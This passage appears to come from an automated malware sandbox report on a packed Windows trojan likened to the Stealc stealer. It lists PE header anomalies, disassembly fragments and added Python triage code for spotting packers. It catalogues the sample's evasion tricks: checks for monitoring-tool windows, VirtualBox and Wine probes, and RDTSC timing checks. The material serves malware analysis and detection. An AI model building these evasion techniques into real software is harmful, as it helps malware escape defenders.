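    summary = checkin_summary(RAW_HEX, CHECKIN_HEADERS)
    print(summary)
    print("stealc-like check-in:", looks_like_stealc_checkin(summary["fields"], CHECKIN_HEADERS))
```

The parser is deliberately naive (it does not handle nested multipart or quoted boundaries containing semicolons); it is enough to turn a sandbox's hex dump into fields you can pivot on, such as the hwid value, which is what the C2 uses to key the victim.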

              System Summary

Source: file.exe | Static PE information: section name: (blank as rendered)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank as rendered)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9C8A1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009248B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB49BA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C38955
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBD164
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC3ACB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB9AB1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BBE3E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C86CCF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC04D9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CBB4FE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B96C44
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB2DE7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9658D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB6542
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3F792
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CB7F7C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9876E
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00904A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: kzyuzjct ZLIB complexity 0.9946100634305682
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00923A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0091CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\K9VMR0XV.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 39%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1790976 > 1048576
Source: file.exe | Static PE information: Raw size of kzyuzjct is bigger than: 0x100000 < 0x19b600

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.900000.0.unpack
  section rights in memory (unpacked): (unnamed):EW; .rsrc:W; .idata:W; (unnamed):EW; kzyuzjct:EW; xpspqxsm:EW; .taggant:EW
  section rights on disk (original):   (unnamed):ER; .rsrc:W; .idata:W; (unnamed):EW; kzyuzjct:EW; xpspqxsm:EW; .taggant:EW
  (the only difference is the first, unnamed section: execute+read on disk, execute+write once unpacked, which is what the "changes PE section rights" signature keys on)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00926390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1b6206 should be: 0x1c3cde
Source: file.exe | Static PE information: section name: (blank as rendered)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank as rendered)
Source: file.exe | Static PE information: section name: kzyuzjct
Source: file.exe | Static PE information: section name: xpspqxsm
Source: file.exe | Static PE information: section name: .taggant
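Every static indicator listed above (entry point in .taggant rather than .text, a stored checksum that does not match the computed one, blank and randomly named sections, writable+executable sections, and a kzyuzjct section with ZLIB complexity close to 1.0) can be read from the PE headers without running the sample. The Python below is an added example, not part of the Joe Sandbox report, that reproduces those checks with the standard library only (no pefile): it walks the section table, finds the section that contains the entry point, recomputes the optional-header CheckSum and measures per-section Shannon entropy as a stand-in for the report's ZLIB complexity score. The sample PE it builds is constructed to mimic this file's section layout and is not the analysed binary; the list of "standard" section names is my assumption.

```python
import math
import struct
from collections import Counter

# Section names a normal linker emits (assumed list); anything else counts as non-standard.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                     ".reloc", ".bss", ".tls", ".pdata", ".CRT", ".didat"}
SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; packed or encrypted data sits near 8.0."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Recompute the optional-header CheckSum the way CheckSumMappedFile does: a one's-
    complement fold of every dword except the CheckSum field itself, plus the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def triage(data: bytes) -> dict:
    """Header-only checks that reproduce the report's packer indicators."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                    # IMAGE_OPTIONAL_HEADER; PE32 and
    entry = struct.unpack_from("<I", data, opt + 16)[0]    # PE32+ share the EntryPoint and
    stored = struct.unpack_from("<I", data, opt + 64)[0]   # CheckSum offsets used here
    sections = []
    for i in range(nsec):
        name, vsize, va, rsize, raw, *_, chars = struct.unpack_from(SECTION_HDR, data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "span": max(vsize, rsize), "chars": chars, "rsize": rsize,
                         "entropy": entropy(data[raw:raw + rsize])})
    ep_sec = next((s["name"] for s in sections if s["va"] <= entry < s["va"] + s["span"]), None)
    computed = pe_checksum(data, opt + 64)
    return {
        "entry_section": ep_sec,
        "entry_outside_standard": ep_sec not in STANDARD_SECTIONS,
        "nonstandard_sections": [s["name"] for s in sections if s["name"] not in STANDARD_SECTIONS],
        "write_exec_sections": [s["name"] for s in sections
                                if s["chars"] & SCN_EXECUTE and s["chars"] & SCN_WRITE],
        "high_entropy_sections": [s["name"] for s in sections if s["rsize"] and s["entropy"] > 7.0],
        "checksum_stored": stored,
        "checksum_computed": computed,
        # A zero CheckSum only means the linker never set one; a wrong non-zero value is the signal.
        "checksum_mismatch": stored != 0 and stored != computed,
    }


def build_sample_pe(stored_checksum: int = 0) -> bytes:
    """Constructed minimal PE32 mimicking this file's layout (unnamed, .rsrc, kzyuzjct,
    .taggant) with the entry point inside .taggant. Not the analysed binary."""
    specs = [  # (name, characteristics, raw bytes)
        (b"", SCN_EXECUTE | SCN_READ, b"\x90" * 0x200),                 # unnamed code, E+R
        (b".rsrc", SCN_READ | SCN_WRITE, b"\0" * 0x200),                # resources, R+W
        (b"kzyuzjct", SCN_EXECUTE | SCN_WRITE, bytes(range(256)) * 2),  # E+W, entropy 8.0
        (b".taggant", SCN_EXECUTE | SCN_WRITE, b"\xc3" * 0x200),        # E+W, holds the entry point
    ]
    hdr_size = 0x200
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000 * len(specs))      # AddressOfEntryPoint -> last section
    struct.pack_into("<I", opt, 28, 0x400000)                 # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)           # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x1000 * (len(specs) + 1), hdr_size)  # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 64, stored_checksum)          # CheckSum
    sec_hdrs, body = b"", b""
    for i, (name, chars, payload) in enumerate(specs):
        sec_hdrs += struct.pack(SECTION_HDR, name.ljust(8, b"\0"), len(payload), 0x1000 * (i + 1),
                                len(payload), hdr_size + len(body), 0, 0, 0, 0, chars)
        body += payload
    # Machine i386, Characteristics EXECUTABLE_IMAGE | 32BIT_MACHINE, as the report lists for file.exe
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, len(opt), 0x102)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)         # e_lfanew = 0x40
    headers = dos + b"PE\0\0" + file_hdr + bytes(opt) + sec_hdrs
    return headers.ljust(hdr_size, b"\0") + body


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key:24} {value}")
```

Run `triage(open(path, "rb").read())` against a real file to get the same view the report gives; the entropy threshold of 7.0 is a rule of thumb, and a legitimate signed installer with a compressed payload section will also trip it, so treat each finding as one weight in a verdict rather than a detection on its own.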
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00927895 push ecx; ret | 0_2_009278A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9C8A1 push eax; mov dword ptr [esp], esi | 0_2_00B9C8FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9C8A1 push ebp; mov dword ptr [esp], 60BEB7C1h | 0_2_00B9C951
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9C8A1 push ebp; mov dword ptr [esp], ecx | 0_2_00B9C981
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9C8A1 push eax; mov dword ptr [esp], 00000004h | 0_2_00B9C985
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9C8A1 push 41145D59h; mov dword ptr [esp], ebp | 0_2_00B9C9C6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9C8A1 push edx; mov dword ptr [esp], 5FB7BC13h | 0_2_00B9CA1E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B9C8A1 push edx; mov dword ptr [esp], esi | 0_2_00B9CAC3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB28C0 push esi; mov dword ptr [esp], 66BD43C2h | 0_2_00DB28F1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DB28C0 push eax; mov dword ptr [esp], ebx | 0_2_00DB29A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D600E8 push eax; mov dword ptr [esp], ecx | 0_2_00D60128
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B4F0E7 push ebp; mov dword ptr [esp], 7F49734Ah | 0_2_00B4F0EB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D67085 push edi; mov dword ptr [esp], ecx | 0_2_00D670CF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CDA8A8 push 238A2370h; mov dword ptr [esp], edx | 0_2_00CDBE88
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D34850 push 149993DFh; mov dword ptr [esp], edx | 0_2_00D3489E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D4A862 push 3515D69Dh; mov dword ptr [esp], ecx | 0_2_00D4A8D6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D4A862 push ecx; mov dword ptr [esp], esi | 0_2_00D4A8EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6E80E push 56105C41h; mov dword ptr [esp], ecx | 0_2_00B6E85F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B6E80E push 0A1FD1FEh; mov dword ptr [esp], edx | 0_2_00B6E87B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3506F push 51BA7F47h; mov dword ptr [esp], ebx | 0_2_00D350AB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D3506F push edx; mov dword ptr [esp], eax | 0_2_00D35106
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D71823 push 3FEC32C8h; mov dword ptr [esp], ebx | 0_2_00D71847
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CF8039 push ecx; mov dword ptr [esp], ebx | 0_2_00CF8115
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD7833 push ebx; mov dword ptr [esp], eax | 0_2_00CD886C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD7833 push 50C6E005h; mov dword ptr [esp], ebx | 0_2_00CD887B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CD7833 push 7391CBC9h; mov dword ptr [esp], eax | 0_2_00CD9461
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D349C8 push 629B2E61h; mov dword ptr [esp], esi | 0_2_00D349F5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D349C8 push 661FBD8Ah; mov dword ptr [esp], eax | 0_2_00D34A2B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CEB9EF push esi; mov dword ptr [esp], edx | 0_2_00CEBA0F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C881F5 push 3F010A5Ch; mov dword ptr [esp], ebx | 0_2_00C882B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C881F5 push ebp; mov dword ptr [esp], eax | 0_2_00C882B9
Source: file.exe | Static PE information: section name: kzyuzjct entropy: 7.953368185260934

              Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00926390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00926390

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-25857
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B50215 second address: B50219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B50219 second address: B5021D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5021D second address: B5024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F11A0C2C898h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 js 00007F11A0C2C886h 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B5024B second address: B50251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B50251 second address: B4FA43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D27BCh], ebx 0x0000000f push dword ptr [ebp+122D1019h] 0x00000015 sub dword ptr [ebp+122D24B9h], edi 0x0000001b call dword ptr [ebp+122D23ABh] 0x00000021 pushad 0x00000022 mov dword ptr [ebp+122D2452h], edi 0x00000028 xor eax, eax 0x0000002a clc 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f mov dword ptr [ebp+122D2452h], ecx 0x00000035 mov dword ptr [ebp+122D395Dh], eax 0x0000003b sub dword ptr [ebp+122D1838h], esi 0x00000041 mov dword ptr [ebp+122D1838h], ebx 0x00000047 mov esi, 0000003Ch 0x0000004c pushad 0x0000004d add dword ptr [ebp+122D1838h], esi 0x00000053 popad 0x00000054 xor dword ptr [ebp+122D2452h], edi 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e pushad 0x0000005f adc di, 8B14h 0x00000064 or bh, 00000017h 0x00000067 popad 0x00000068 mov dword ptr [ebp+122D1838h], ecx 0x0000006e lodsw 0x00000070 add dword ptr [ebp+122D1838h], edi 0x00000076 clc 0x00000077 add eax, dword ptr [esp+24h] 0x0000007b pushad 0x0000007c mov esi, dword ptr [ebp+122D374Dh] 0x00000082 mov dword ptr [ebp+122D19F6h], eax 0x00000088 popad 0x00000089 mov ebx, dword ptr [esp+24h] 0x0000008d jmp 00007F11A0C2C895h 0x00000092 push eax 0x00000093 push eax 0x00000094 push edx 0x00000095 jnc 00007F11A0C2C888h 0x0000009b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC8913 second address: CC891D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC891D second address: CC8959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F11A0C2C88Ah 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 jmp 00007F11A0C2C899h 0x00000019 pop eax 0x0000001a jne 00007F11A0C2C88Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC8A85 second address: CC8A99 instructions: 0x00000000 rdtsc 0x00000002 je 00007F11A0CA9286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F11A0CA928Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC8D7A second address: CC8D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC8EE4 second address: CC8EF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F11A0CA928Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC8EF5 second address: CC8EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC9058 second address: CC905D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC905D second address: CC9069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F11A0C2C886h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC91B4 second address: CC91BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC91BC second address: CC91C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC91C2 second address: CC91CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F11A0CA9286h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC91CE second address: CC91D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CC91D7 second address: CC91DD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCBEDB second address: B4FA43 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 41E7C838h 0x0000000f xor esi, 6210E34Eh 0x00000015 push dword ptr [ebp+122D1019h] 0x0000001b mov dword ptr [ebp+122D1828h], ecx 0x00000021 mov dh, bh 0x00000023 call dword ptr [ebp+122D23ABh] 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122D2452h], edi 0x00000030 xor eax, eax 0x00000032 clc 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 mov dword ptr [ebp+122D2452h], ecx 0x0000003d mov dword ptr [ebp+122D395Dh], eax 0x00000043 sub dword ptr [ebp+122D1838h], esi 0x00000049 mov dword ptr [ebp+122D1838h], ebx 0x0000004f mov esi, 0000003Ch 0x00000054 pushad 0x00000055 add dword ptr [ebp+122D1838h], esi 0x0000005b popad 0x0000005c xor dword ptr [ebp+122D2452h], edi 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 pushad 0x00000067 adc di, 8B14h 0x0000006c or bh, 00000017h 0x0000006f popad 0x00000070 mov dword ptr [ebp+122D1838h], ecx 0x00000076 lodsw 0x00000078 add dword ptr [ebp+122D1838h], edi 0x0000007e clc 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 pushad 0x00000084 mov esi, dword ptr [ebp+122D374Dh] 0x0000008a mov dword ptr [ebp+122D19F6h], eax 0x00000090 popad 0x00000091 mov ebx, dword ptr [esp+24h] 0x00000095 jmp 00007F11A0C2C895h 0x0000009a push eax 0x0000009b push eax 0x0000009c push edx 0x0000009d jnc 00007F11A0C2C888h 0x000000a3 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCBF1B second address: CCBF21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCBF21 second address: CCBF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCC024 second address: CCC038 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F11A0CA9290h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCC038 second address: CCC04B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F11A0C2C88Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCC04B second address: CCC04F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCC04F second address: CCC091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 5B1F3903h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F11A0C2C888h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov esi, dword ptr [ebp+122D2815h] 0x0000002f lea ebx, dword ptr [ebp+1244FDD5h] 0x00000035 mov di, ax 0x00000038 push eax 0x00000039 pushad 0x0000003a push edi 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCC091 second address: CCC0A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F11A0CA928Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCC17A second address: CCC17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCC17F second address: CCC184 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CCC184 second address: CCC18A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
